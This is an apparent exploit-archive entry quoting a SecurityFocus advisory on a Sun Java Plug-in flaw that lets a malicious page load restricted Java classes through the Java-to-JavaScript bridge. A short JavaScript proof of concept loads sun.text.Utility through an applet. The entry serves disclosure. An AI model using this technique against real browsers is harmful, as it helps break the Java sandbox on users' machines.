8 lines
No EOL
546 B
Text
8 lines
No EOL
546 B
Text
source: http://www.securityfocus.com/bid/11726/info
|
|
|
|
A vulnerability is reported to exist in the access controls of the Java to JavaScript data exchange within web browsers that employ the Sun Java Plug-in. Reports indicate that it is possible for a malicious website that contains JavaScript code to exploit this vulnerability to load a dangerous Java class and to pass this class to an invoked applet.
|
|
|
|
[script language=javascript]
|
|
var c=document.applets[0].getClass().forName('sun.text.Utility');
|
|
alert('got Class object: '+c)
|
|
[/script] |